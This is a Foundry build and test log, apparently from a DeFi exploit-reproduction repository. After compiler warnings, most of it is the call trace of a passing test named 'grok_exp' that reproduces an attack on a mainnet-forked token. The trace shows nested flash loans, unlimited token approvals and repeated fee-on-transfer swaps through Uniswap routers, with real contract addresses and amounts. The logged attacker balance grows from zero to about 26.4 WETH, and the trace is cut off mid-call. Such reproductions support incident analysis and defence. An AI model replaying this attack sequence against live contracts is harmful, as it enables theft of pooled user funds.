Compiling 23 files with Solc 0.8.28
Solc 0.8.28 finished in 1.35s
Compiler run successful with warnings:
Warning (2519): This declaration shadows an existing declaration.
    --> src/test/interface.sol:1084:5:
     |
1084 |     function WETH() external view returns (address);
     |     ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
Note: The shadowed declaration is here:
   --> src/test/interface.sol:805:1:
    |
805 | interface WETH {
    | ^ (Relevant source part starts here and spans across multiple lines).

Warning (2519): This declaration shadows an existing declaration.
    --> src/test/interface.sol:1896:5:
     |
1896 |     function WETH() external view returns (address);
     |     ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
Note: The shadowed declaration is here:
   --> src/test/interface.sol:805:1:
    |
805 | interface WETH {
    | ^ (Relevant source part starts here and spans across multiple lines).

Warning (2519): This declaration shadows an existing declaration.
    --> src/test/interface.sol:2198:5:
     |
2198 |     function WETH() external view returns (address);
     |     ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
Note: The shadowed declaration is here:
   --> src/test/interface.sol:805:1:
    |
805 | interface WETH {
    | ^ (Relevant source part starts here and spans across multiple lines).

Warning (2519): This declaration shadows an existing declaration.
    --> src/test/interface.sol:2967:5:
     |
2967 |     function WETH() external view returns (address);
     |     ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
Note: The shadowed declaration is here:
   --> src/test/interface.sol:805:1:
    |
805 | interface WETH {
    | ^ (Relevant source part starts here and spans across multiple lines).

Warning (2519): This declaration shadows an existing declaration.
    --> src/test/interface.sol:4424:5:
     |
4424 |     function WETH() external view returns (address);
     |     ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
Note: The shadowed declaration is here:
   --> src/test/interface.sol:805:1:
    |
805 | interface WETH {
    | ^ (Relevant source part starts here and spans across multiple lines).

Warning (5667): Unused function parameter. Remove or comment out the variable name to silence this warning.
  --> src/test/2023-11/grok_exp.sol:37:37:
   |
37 |     function uniswapV3FlashCallback(uint256 amount0, uint256 amount1, bytes calldata data) external {
   |                                     ^^^^^^^^^^^^^^^

Warning (5667): Unused function parameter. Remove or comment out the variable name to silence this warning.
  --> src/test/2023-11/grok_exp.sol:37:71:
   |
37 |     function uniswapV3FlashCallback(uint256 amount0, uint256 amount1, bytes calldata data) external {
   |                                                                       ^^^^^^^^^^^^^^^^^^^


Ran 1 test for script/Exploit-template_new.sol:ExploitScript
[PASS] testExploit() (gas: 23756)
Logs:
  Attacker ETH Balance Before exploit: 0.000000000000000000
  Attacker ETH Balance After exploit: 0.000000000000000000

Traces:
  [7939] ExploitScript::setUp()
    ├─ [0] VM::createSelectFork("mainnet", 1234567 [1.234e6])
    │   └─ ← [Return] 0
    └─ ← [Stop]

  [23756] ExploitScript::testExploit()
    ├─ [0] VM::deal(ExploitScript: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 0)
    │   └─ ← [Return]
    ├─ emit log_named_decimal_uint(key: "Attacker ETH Balance Before exploit", val: 0, decimals: 18)
    ├─ emit log_named_decimal_uint(key: "Attacker ETH Balance After exploit", val: 0, decimals: 18)
    └─ ← [Stop]

Suite result: ok. 1 passed; 0 failed; 0 skipped; finished in 1.47s (5.81ms CPU time)

Ran 1 test for src/test/2023-11/grok_exp.sol:ContractTest
[PASS] testExpolit() (gas: 797779)
Logs:
  attaker balance before attack:: 0.000000000000000000
  attaker balance after attack:: 26.389150208935126563

Traces:
  [8640] ContractTest::setUp()
    ├─ [0] VM::createSelectFork("mainnet", 18538678 [1.853e7])
    │   └─ ← [Return] 0
    ├─ [0] VM::label(WETH: [0xC02aaA39b223FE8D0A0e5C4F27eAD9083C756Cc2], "WETH")
    │   └─ ← [Return]
    └─ ← [Stop]

  [939579] ContractTest::testExpolit()
    ├─ [2534] WETH::balanceOf(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496]) [staticcall]
    │   └─ ← [Return] 0
    ├─ [2444] WETH::decimals() [staticcall]
    │   └─ ← [Return] 18
    ├─ emit log_named_decimal_uint(key: "attaker balance before attack:", val: 0, decimals: 18)
    ├─ [914509] 0x109830a1AAaD605BbF02a9dFA7B0B92EC2FB7dAa::flash(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 0, 30000000000000000000 [3e19], 0x00)
    │   ├─ [2534] 0x7f39C581F595B53c5cb19bD0b3f8dA6c935E2Ca0::balanceOf(0x109830a1AAaD605BbF02a9dFA7B0B92EC2FB7dAa) [staticcall]
    │   │   └─ ← [Return] 7463189077965464780474 [7.463e21]
    │   ├─ [2534] WETH::balanceOf(0x109830a1AAaD605BbF02a9dFA7B0B92EC2FB7dAa) [staticcall]
    │   │   └─ ← [Return] 3830213572683420764516 [3.83e21]
    │   ├─ [25962] WETH::transfer(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 30000000000000000000 [3e19])
    │   │   ├─ emit Transfer(from: 0x109830a1AAaD605BbF02a9dFA7B0B92EC2FB7dAa, to: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], value: 30000000000000000000 [3e19])
    │   │   ├─  storage changes:
    │   │   │   @ 0x3355aa162647aa87d59169dcdc67640130e9607c9491efc2a497dc7a2abf1102: 0x0000000000000000000000000000000000000000000000cfa2e42703ab1d8964 → 0x0000000000000000000000000000000000000000000000ce028ebdf60d658964
    │   │   │   @ 0x1da434b76eba4736d6e760bfd78cbf883a0776ee1666a9157f99ab1b97923a3c: 0 → 0x000000000000000000000000000000000000000000000001a055690d9db80000
    │   │   └─ ← [Return] true
    │   ├─ [857713] ContractTest::uniswapV3FlashCallback(0, 3000000000000000 [3e15], 0x00)
    │   │   ├─ [559045] 0x66bA59cBD09E75B209D1D7E8Cf97f4Ab34DA413B::flash(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 63433590767572373 [6.343e16], 0, 0x00)
    │   │   │   ├─ [2617] 0x8390a1DA07E376ef7aDd4Be859BA74Fb83aA02D5::balanceOf(0x66bA59cBD09E75B209D1D7E8Cf97f4Ab34DA413B) [staticcall]
    │   │   │   │   └─ ← [Return] 63433590767572373 [6.343e16]
    │   │   │   ├─ [2534] WETH::balanceOf(0x66bA59cBD09E75B209D1D7E8Cf97f4Ab34DA413B) [staticcall]
    │   │   │   │   └─ ← [Return] 162684446548638971088 [1.626e20]
    │   │   │   ├─ [52001] 0x8390a1DA07E376ef7aDd4Be859BA74Fb83aA02D5::transfer(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 63433590767572373 [6.343e16])
    │   │   │   │   ├─ emit Transfer(from: 0x66bA59cBD09E75B209D1D7E8Cf97f4Ab34DA413B, to: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], value: 63433590767572373 [6.343e16])
    │   │   │   │   ├─  storage changes:
    │   │   │   │   │   @ 0xa474726fc09f41f3c20610c61c95ca18ae9853cba1981b1b83e50cc3a6011f21: 0x00000000000000000000000000000000000000000000000000e15c83c4875595 → 0
    │   │   │   │   │   @ 0xb38645331535d8a24250bd866c230d0d85c11b90105fdba49ccc7bb4d9c6bc96: 0 → 0x00000000000000000000000000000000000000000000000000e15c83c4875595
    │   │   │   │   └─ ← [Return] true
    │   │   │   ├─ [476019] ContractTest::uniswapV3FlashCallback(634335907675724 [6.343e14], 0, 0x00)
    │   │   │   │   ├─ [24420] WETH::approve(0x7a250d5630B4cF539739dF2C5dAcb4c659F2488D, 115792089237316195423570985008687907853269984665640564039457584007913129639935 [1.157e77])
    │   │   │   │   │   ├─ emit Approval(owner: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], spender: 0x7a250d5630B4cF539739dF2C5dAcb4c659F2488D, value: 115792089237316195423570985008687907853269984665640564039457584007913129639935 [1.157e77])
    │   │   │   │   │   ├─  storage changes:
    │   │   │   │   │   │   @ 0x466c74776b1cb1a6f02cc765a14cd3bfd6607c3d7fcc2476c94e5bc071e25f00: 0 → 0xffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
    │   │   │   │   │   └─ ← [Return] true
    │   │   │   │   ├─ [24633] 0x8390a1DA07E376ef7aDd4Be859BA74Fb83aA02D5::approve(0x7a250d5630B4cF539739dF2C5dAcb4c659F2488D, 115792089237316195423570985008687907853269984665640564039457584007913129639935 [1.157e77])
    │   │   │   │   │   ├─ emit Approval(owner: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], spender: 0x7a250d5630B4cF539739dF2C5dAcb4c659F2488D, value: 115792089237316195423570985008687907853269984665640564039457584007913129639935 [1.157e77])
    │   │   │   │   │   ├─  storage changes:
    │   │   │   │   │   │   @ 0x26de9a43e7704b60d31f71cc330b4d43a0db9dad71c363e2fbd9119e9db294b7: 0 → 0xffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
    │   │   │   │   │   └─ ← [Return] true
    │   │   │   │   ├─ [24633] 0x8390a1DA07E376ef7aDd4Be859BA74Fb83aA02D5::approve(0xE592427A0AEce92De3Edee1F18E0157C05861564, 115792089237316195423570985008687907853269984665640564039457584007913129639935 [1.157e77])
    │   │   │   │   │   ├─ emit Approval(owner: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], spender: 0xE592427A0AEce92De3Edee1F18E0157C05861564, value: 115792089237316195423570985008687907853269984665640564039457584007913129639935 [1.157e77])
    │   │   │   │   │   ├─  storage changes:
    │   │   │   │   │   │   @ 0xb8b3dd7b343e4967bcca95a8f7fb77b7990e98e0367fb174bf8dfeca3548cc2e: 0 → 0xffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
    │   │   │   │   │   └─ ← [Return] true
    │   │   │   │   ├─ [77802] 0x7a250d5630B4cF539739dF2C5dAcb4c659F2488D::swapExactTokensForTokensSupportingFeeOnTransferTokens(30695631768482954 [3.069e16], 0, [0x8390a1DA07E376ef7aDd4Be859BA74Fb83aA02D5, 0xC02aaA39b223FE8D0A0e5C4F27eAD9083C756Cc2], ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 1699584783 [1.699e9])
    │   │   │   │   │   ├─ [23435] 0x8390a1DA07E376ef7aDd4Be859BA74Fb83aA02D5::transferFrom(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 0x69c66BeAfB06674Db41b22CFC50c34A93b8d82a2, 30695631768482954 [3.069e16])
    │   │   │   │   │   │   ├─ emit Transfer(from: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], to: 0x69c66BeAfB06674Db41b22CFC50c34A93b8d82a2, value: 30695631768482954 [3.069e16])
    │   │   │   │   │   │   ├─ emit Approval(owner: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], spender: 0x7a250d5630B4cF539739dF2C5dAcb4c659F2488D, value: 115792089237316195423570985008687907853269984665640564039457553312281361156981 [1.157e77])
    │   │   │   │   │   │   ├─  storage changes:
    │   │   │   │   │   │   │   @ 0x4136c5a29233bd6e1eb4ac9d2704c839930ce9ceeb6c22ea86798eecfffb19a6: 0x0000000000000000000000000000000000000000000000000125f19f661156be → 0x0000000000000000000000000000000000000000000000000192ff2319c8cb48
    │   │   │   │   │   │   │   @ 0x26de9a43e7704b60d31f71cc330b4d43a0db9dad71c363e2fbd9119e9db294b7: 0xffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff → 0xffffffffffffffffffffffffffffffffffffffffffffffffff92f27c4c488b75
    │   │   │   │   │   │   │   @ 0xb38645331535d8a24250bd866c230d0d85c11b90105fdba49ccc7bb4d9c6bc96: 0x00000000000000000000000000000000000000000000000000e15c83c4875595 → 0x00000000000000000000000000000000000000000000000000744f0010cfe10b
    │   │   │   │   │   │   └─ ← [Return] true
    │   │   │   │   │   ├─ [534] WETH::balanceOf(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496]) [staticcall]
    │   │   │   │   │   │   └─ ← [Return] 30000000000000000000 [3e19]
    │   │   │   │   │   ├─ [2504] 0x69c66BeAfB06674Db41b22CFC50c34A93b8d82a2::getReserves() [staticcall]
    │   │   │   │   │   │   └─ ← [Return] 82737835090728638 [8.273e16], 200481799332731943212 [2.004e20], 1699584671 [1.699e9]
    │   │   │   │   │   ├─ [617] 0x8390a1DA07E376ef7aDd4Be859BA74Fb83aA02D5::balanceOf(0x69c66BeAfB06674Db41b22CFC50c34A93b8d82a2) [staticcall]
    │   │   │   │   │   │   └─ ← [Return] 113433466859211592 [1.134e17]
    │   │   │   │   │   ├─ [40536] 0x69c66BeAfB06674Db41b22CFC50c34A93b8d82a2::swap(0, 54132513157052448211 [5.413e19], ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 0x)
    │   │   │   │   │   │   ├─ [8062] WETH::transfer(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 54132513157052448211 [5.413e19])
    │   │   │   │   │   │   │   ├─ emit Transfer(from: 0x69c66BeAfB06674Db41b22CFC50c34A93b8d82a2, to: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], value: 54132513157052448211 [5.413e19])
    │   │   │   │   │   │   │   ├─  storage changes:
    │   │   │   │   │   │   │   │   @ 0x564849b19bcf06fcce9f147d09c1c709d0718e975cdd1cf0a30b74a71c297f8c: 0x00000000000000000000000000000000000000000000000ade3e6e4b86a1f92c → 0x000000000000000000000000000000000000000000000007ef011c62915cbb59
    │   │   │   │   │   │   │   │   @ 0x1da434b76eba4736d6e760bfd78cbf883a0776ee1666a9157f99ab1b97923a3c: 0x000000000000000000000000000000000000000000000001a055690d9db80000 → 0x0000000000000000000000000000000000000000000000048f92baf692fd3dd3
    │   │   │   │   │   │   │   └─ ← [Return] true
    │   │   │   │   │   │   ├─ [617] 0x8390a1DA07E376ef7aDd4Be859BA74Fb83aA02D5::balanceOf(0x69c66BeAfB06674Db41b22CFC50c34A93b8d82a2) [staticcall]
    │   │   │   │   │   │   │   └─ ← [Return] 113433466859211592 [1.134e17]
    │   │   │   │   │   │   ├─ [534] WETH::balanceOf(0x69c66BeAfB06674Db41b22CFC50c34A93b8d82a2) [staticcall]
    │   │   │   │   │   │   │   └─ ← [Return] 146349286175679495001 [1.463e20]
    │   │   │   │   │   │   ├─ emit Sync(reserve0: 113433466859211592 [1.134e17], reserve1: 146349286175679495001 [1.463e20])
    │   │   │   │   │   │   ├─ emit Swap(sender: 0x7a250d5630B4cF539739dF2C5dAcb4c659F2488D, amount0In: 30695631768482954 [3.069e16], amount1In: 0, amount0Out: 0, amount1Out: 54132513157052448211 [5.413e19], to: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496])
    │   │   │   │   │   │   ├─  storage changes:
    │   │   │   │   │   │   │   @ 10: 0x00000000000000000000000000000000050b773f8aa6450c405c1eb55029486c → 0x00000000000000000000000000000000050b788419205459511b0eaec1f05004
    │   │   │   │   │   │   │   @ 8: 0x654d9a9f00000000000ade3e6e4b86a1f92c0000000000000125f19f661156be → 0x654d9aab000000000007ef011c62915cbb590000000000000192ff2319c8cb48
    │   │   │   │   │   │   │   @ 9: 0x00000000000000000000000000001f1934c2f1bd7fd2bf0f09d6715f5d670ed0 → 0x00000000000000000000000000001f19a6581bb31c22f006f7aa4e4a9cbc0bd0
    │   │   │   │   │   │   └─ ← [Stop]
    │   │   │   │   │   ├─ [534] WETH::balanceOf(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496]) [staticcall]
    │   │   │   │   │   │   └─ ← [Return] 84132513157052448211 [8.413e19]
    │   │   │   │   │   └─ ← [Stop]
    │   │   │   │   ├─ [13697] 0x8390a1DA07E376ef7aDd4Be859BA74Fb83aA02D5::transfer(0x8390a1DA07E376ef7aDd4Be859BA74Fb83aA02D5, 2737958999089419 [2.737e15])
    │   │   │   │   │   ├─ emit Transfer(from: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], to: 0x8390a1DA07E376ef7aDd4Be859BA74Fb83aA02D5, value: 2737958999089419 [2.737e15])
    │   │   │   │   │   ├─  storage changes:
    │   │   │   │   │   │   @ 0xb38645331535d8a24250bd866c230d0d85c11b90105fdba49ccc7bb4d9c6bc96: 0x00000000000000000000000000000000000000000000000000744f0010cfe10b → 0x000000000000000000000000000000000000000000000000006a94d74f430000
    │   │   │   │   │   │   @ 0x4eee3e6129f13be77ddda62523dc4512bbc861aa373bdaadd88dde9639393ab9: 0x00000000000000000000000000000000000000000000000000eb68f9e38e68f5 → 0x00000000000000000000000000000000000000000000000000f52322a51b4a00
    │   │   │   │   │   └─ ← [Return] true
    │   │   │   │   ├─ [157029] 0x7a250d5630B4cF539739dF2C5dAcb4c659F2488D::swapExactTokensForTokensSupportingFeeOnTransferTokens(30000000000000000 [3e16], 0, [0x8390a1DA07E376ef7aDd4Be859BA74Fb83aA02D5, 0xC02aaA39b223FE8D0A0e5C4F27eAD9083C756Cc2], ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 1699584783 [1.699e9])
    │   │   │   │   │   ├─ [131178] 0x8390a1DA07E376ef7aDd4Be859BA74Fb83aA02D5::transferFrom(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 0x69c66BeAfB06674Db41b22CFC50c34A93b8d82a2, 30000000000000000 [3e16])
    │   │   │   │   │   │   ├─ [275] 0x7a250d5630B4cF539739dF2C5dAcb4c659F2488D::WETH() [staticcall]
    │   │   │   │   │   │   │   └─ ← [Return] WETH: [0xC02aaA39b223FE8D0A0e5C4F27eAD9083C756Cc2]
    │   │   │   │   │   │   ├─ emit Approval(owner: 0x8390a1DA07E376ef7aDd4Be859BA74Fb83aA02D5, spender: 0x7a250d5630B4cF539739dF2C5dAcb4c659F2488D, value: 30000000000000000 [3e16])
    │   │   │   │   │   │   ├─ [72943] 0x7a250d5630B4cF539739dF2C5dAcb4c659F2488D::swapExactTokensForETHSupportingFeeOnTransferTokens(30000000000000000 [3e16], 0, [0x8390a1DA07E376ef7aDd4Be859BA74Fb83aA02D5, 0xC02aaA39b223FE8D0A0e5C4F27eAD9083C756Cc2], 0x8390a1DA07E376ef7aDd4Be859BA74Fb83aA02D5, 1699584683 [1.699e9])
    │   │   │   │   │   │   │   ├─ [9453] 0x8390a1DA07E376ef7aDd4Be859BA74Fb83aA02D5::transferFrom(0x8390a1DA07E376ef7aDd4Be859BA74Fb83aA02D5, 0x69c66BeAfB06674Db41b22CFC50c34A93b8d82a2, 30000000000000000 [3e16])
    │   │   │   │   │   │   │   │   ├─ emit Transfer(from: 0x8390a1DA07E376ef7aDd4Be859BA74Fb83aA02D5, to: 0x69c66BeAfB06674Db41b22CFC50c34A93b8d82a2, value: 30000000000000000 [3e16])
    │   │   │   │   │   │   │   │   ├─ emit Approval(owner: 0x8390a1DA07E376ef7aDd4Be859BA74Fb83aA02D5, spender: 0x7a250d5630B4cF539739dF2C5dAcb4c659F2488D, value: 0)
    │   │   │   │   │   │   │   │   ├─  storage changes:
    │   │   │   │   │   │   │   │   │   @ 0x4136c5a29233bd6e1eb4ac9d2704c839930ce9ceeb6c22ea86798eecfffb19a6: 0x0000000000000000000000000000000000000000000000000192ff2319c8cb48 → 0x00000000000000000000000000000000000000000000000001fd93fa690bcb48
    │   │   │   │   │   │   │   │   │   @ 0xa5c847d2341339c776baae49caa9db490f7c7f31ad2c2c8f80ba34f32b35710e: 0x000000000000000000000000000000000000000000000000006a94d74f430000 → 0
    │   │   │   │   │   │   │   │   │   @ 0x4eee3e6129f13be77ddda62523dc4512bbc861aa373bdaadd88dde9639393ab9: 0x00000000000000000000000000000000000000000000000000f52322a51b4a00 → 0x000000000000000000000000000000000000000000000000008a8e4b55d84a00
    │   │   │   │   │   │   │   │   └─ ← [Return] true
    │   │   │   │   │   │   │   ├─ [504] 0x69c66BeAfB06674Db41b22CFC50c34A93b8d82a2::getReserves() [staticcall]
    │   │   │   │   │   │   │   │   └─ ← [Return] 113433466859211592 [1.134e17], 146349286175679495001 [1.463e20], 1699584683 [1.699e9]
    │   │   │   │   │   │   │   ├─ [617] 0x8390a1DA07E376ef7aDd4Be859BA74Fb83aA02D5::balanceOf(0x69c66BeAfB06674Db41b22CFC50c34A93b8d82a2) [staticcall]
    │   │   │   │   │   │   │   │   └─ ← [Return] 143433466859211592 [1.434e17]
    │   │   │   │   │   │   │   ├─ [38420] 0x69c66BeAfB06674Db41b22CFC50c34A93b8d82a2::swap(0, 30537193256347403114 [3.053e19], 0x7a250d5630B4cF539739dF2C5dAcb4c659F2488D, 0x)
    │   │   │   │   │   │   │   │   ├─ [25162] WETH::transfer(0x7a250d5630B4cF539739dF2C5dAcb4c659F2488D, 30537193256347403114 [3.053e19])
    │   │   │   │   │   │   │   │   │   ├─ emit Transfer(from: 0x69c66BeAfB06674Db41b22CFC50c34A93b8d82a2, to: 0x7a250d5630B4cF539739dF2C5dAcb4c659F2488D, value: 30537193256347403114 [3.053e19])
    │   │   │   │   │   │   │   │   │   ├─  storage changes:
    │   │   │   │   │   │   │   │   │   │   @ 0x564849b19bcf06fcce9f147d09c1c709d0718e975cdd1cf0a30b74a71c297f8c: 0x000000000000000000000000000000000000000000000007ef011c62915cbb59 → 0x000000000000000000000000000000000000000000000006473734e94f5237ef
    │   │   │   │   │   │   │   │   │   │   @ 0xfb19a963956c9cb662dd3ae48988c4b90766df71ea130109840abe0a1b23dba8: 0 → 0x000000000000000000000000000000000000000000000001a7c9e779420a836a
    │   │   │   │   │   │   │   │   │   └─ ← [Return] true
    │   │   │   │   │   │   │   │   ├─ [617] 0x8390a1DA07E376ef7aDd4Be859BA74Fb83aA02D5::balanceOf(0x69c66BeAfB06674Db41b22CFC50c34A93b8d82a2) [staticcall]
    │   │   │   │   │   │   │   │   │   └─ ← [Return] 143433466859211592 [1.434e17]
    │   │   │   │   │   │   │   │   ├─ [534] WETH::balanceOf(0x69c66BeAfB06674Db41b22CFC50c34A93b8d82a2) [staticcall]
    │   │   │   │   │   │   │   │   │   └─ ← [Return] 115812092919332091887 [1.158e20]
    │   │   │   │   │   │   │   │   ├─ emit Sync(reserve0: 143433466859211592 [1.434e17], reserve1: 115812092919332091887 [1.158e20])
    │   │   │   │   │   │   │   │   ├─ emit Swap(sender: 0x7a250d5630B4cF539739dF2C5dAcb4c659F2488D, amount0In: 30000000000000000 [3e16], amount1In: 0, amount0Out: 0, amount1Out: 30537193256347403114 [3.053e19], to: 0x7a250d5630B4cF539739dF2C5dAcb4c659F2488D)
    │   │   │   │   │   │   │   │   ├─  storage changes:
    │   │   │   │   │   │   │   │   │   @ 8: 0x654d9aab000000000007ef011c62915cbb590000000000000192ff2319c8cb48 → 0x654d9aab000000000006473734e94f5237ef00000000000001fd93fa690bcb48
    │   │   │   │   │   │   │   │   └─ ← [Stop]
    │   │   │   │   │   │   │   ├─ [534] WETH::balanceOf(0x7a250d5630B4cF539739dF2C5dAcb4c659F2488D) [staticcall]
    │   │   │   │   │   │   │   │   └─ ← [Return] 30537193256347403114 [3.053e19]
    │   │   │   │   │   │   │   ├─ [9223] WETH::withdraw(30537193256347403114 [3.053e19])
    │   │   │   │   │   │   │   │   ├─ [83] 0x7a250d5630B4cF539739dF2C5dAcb4c659F2488D::fallback{value: 30537193256347403114}()
    │   │   │   │   │   │   │   │   │   └─ ← [Stop]
    │   │   │   │   │   │   │   │   ├─ emit Withdrawal(src: 0x7a250d5630B4cF539739dF2C5dAcb4c659F2488D, wad: 30537193256347403114 [3.053e19])
    │   │   │   │   │   │   │   │   ├─  storage changes:
    │   │   │   │   │   │   │   │   │   @ 0xfb19a963956c9cb662dd3ae48988c4b90766df71ea130109840abe0a1b23dba8: 0x000000000000000000000000000000000000000000000001a7c9e779420a836a → 0
    │   │   │   │   │   │   │   │   └─ ← [Stop]
    │   │   │   │   │   │   │   ├─ [55] 0x8390a1DA07E376ef7aDd4Be859BA74Fb83aA02D5::fallback{value: 30537193256347403114}()
    │   │   │   │   │   │   │   │   └─ ← [Stop]
    │   │   │   │   │   │   │   └─ ← [Stop]
    │   │   │   │   │   │   ├─ [0] 0xf9387aC9F61cc22994a59A6008F827435cE744B6::fallback{value: 33898620427563532883}()
    │   │   │   │   │   │   │   └─ ← [Stop]
    │   │   │   │   │   │   ├─ emit Transfer(from: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], to: 0x69c66BeAfB06674Db41b22CFC50c34A93b8d82a2, value: 30000000000000000 [3e16])
    │   │   │   │   │   │   ├─ emit Approval(owner: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], spender: 0x7a250d5630B4cF539739dF2C5dAcb4c659F2488D, value: 115792089237316195423570985008687907853269984665640564039457523312281361156981 [1.157e77])
    │   │   │   │   │   │   ├─  storage changes:
    │   │   │   │   │   │   │   @ 0xa5c847d2341339c776baae49caa9db490f7c7f31ad2c2c8f80ba34f32b35710e: 0 → 0x000000000000000000000000000000000000000000000000006a94d74f430000
    │   │   │   │   │   │   │   @ 0x4136c5a29233bd6e1eb4ac9d2704c839930ce9ceeb6c22ea86798eecfffb19a6: 0x00000000000000000000000000000000000000000000000001fd93fa690bcb48 → 0x000000000000000000000000000000000000000000000000026828d1b84ecb48
    │   │   │   │   │   │   │   @ 0xb38645331535d8a24250bd866c230d0d85c11b90105fdba49ccc7bb4d9c6bc96: 0x000000000000000000000000000000000000000000000000006a94d74f430000 → 0
    │   │   │   │   │   │   │   @ 0x26de9a43e7704b60d31f71cc330b4d43a0db9dad71c363e2fbd9119e9db294b7: 0xffffffffffffffffffffffffffffffffffffffffffffffffff92f27c4c488b75 → 0xffffffffffffffffffffffffffffffffffffffffffffffffff285da4fd058b75
    │   │   │   │   │   │   └─ ← [Return] true
    │   │   │   │   │   ├─ [534] WETH::balanceOf(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496]) [staticcall]
    │   │   │   │   │   │   └─ ← [Return] 84132513157052448211 [8.413e19]
    │   │   │   │   │   ├─ [504] 0x69c66BeAfB06674Db41b22CFC50c34A93b8d82a2::getReserves() [staticcall]
    │   │   │   │   │   │   └─ ← [Return] 143433466859211592 [1.434e17], 115812092919332091887 [1.158e20], 1699584683 [1.699e9]
    │   │   │   │   │   ├─ [617] 0x8390a1DA07E376ef7aDd4Be859BA74Fb83aA02D5::balanceOf(0x69c66BeAfB06674Db41b22CFC50c34A93b8d82a2) [staticcall]
    │   │   │   │   │   │   └─ ← [Return] 173433466859211592 [1.734e17]
    │   │   │   │   │   ├─ [16520] 0x69c66BeAfB06674Db41b22CFC50c34A93b8d82a2::swap(0, 19983099230561781690 [1.998e19], ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 0x)
    │   │   │   │   │   │   ├─ [3262] WETH::transfer(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 19983099230561781690 [1.998e19])
    │   │   │   │   │   │   │   ├─ emit Transfer(from: 0x69c66BeAfB06674Db41b22CFC50c34A93b8d82a2, to: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], value: 19983099230561781690 [1.998e19])
    │   │   │   │   │   │   │   ├─  storage changes:
    │   │   │   │   │   │   │   │   @ 0x564849b19bcf06fcce9f147d09c1c709d0718e975cdd1cf0a30b74a71c297f8c: 0x000000000000000000000000000000000000000000000006473734e94f5237ef → 0x00000000000000000000000000000000000000000000000531e4fa09424df035
    │   │   │   │   │   │   │   │   @ 0x1da434b76eba4736d6e760bfd78cbf883a0776ee1666a9157f99ab1b97923a3c: 0x0000000000000000000000000000000000000000000000048f92baf692fd3dd3 → 0x000000000000000000000000000000000000000000000005a4e4f5d6a001858d
    │   │   │   │   │   │   │   └─ ← [Return] true
    │   │   │   │   │   │   ├─ [617] 0x8390a1DA07E376ef7aDd4Be859BA74Fb83aA02D5::balanceOf(0x69c66BeAfB06674Db41b22CFC50c34A93b8d82a2) [staticcall]
    │   │   │   │   │   │   │   └─ ← [Return] 173433466859211592 [1.734e17]
    │   │   │   │   │   │   ├─ [534] WETH::balanceOf(0x69c66BeAfB06674Db41b22CFC50c34A93b8d82a2) [staticcall]
    │   │   │   │   │   │   │   └─ ← [Return] 95828993688770310197 [9.582e19]
    │   │   │   │   │   │   ├─ emit Sync(reserve0: 173433466859211592 [1.734e17], reserve1: 95828993688770310197 [9.582e19])
    │   │   │   │   │   │   ├─ emit Swap(sender: 0x7a250d5630B4cF539739dF2C5dAcb4c659F2488D, amount0In: 30000000000000000 [3e16], amount1In: 0, amount0Out: 0, amount1Out: 19983099230561781690 [1.998e19], to: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496])
    │   │   │   │   │   │   ├─  storage changes:
    │   │   │   │   │   │   │   @ 8: 0x654d9aab000000000006473734e94f5237ef00000000000001fd93fa690bcb48 → 0x654d9aab00000000000531e4fa09424df035000000000000026828d1b84ecb48
    │   │   │   │   │   │   └─ ← [Stop]
    │   │   │   │   │   ├─ [534] WETH::balanceOf(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496]) [staticcall]
    │   │   │   │   │   │   └─ ← [Return] 104115612387614229901 [1.041e20]
    │   │   │   │   │   └─ ← [Stop]
    │   │   │   │   ├─ [534] WETH::balanceOf(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496]) [staticcall]
    │   │   │   │   │   └─ ← [Return] 104115612387614229901 [1.041e20]
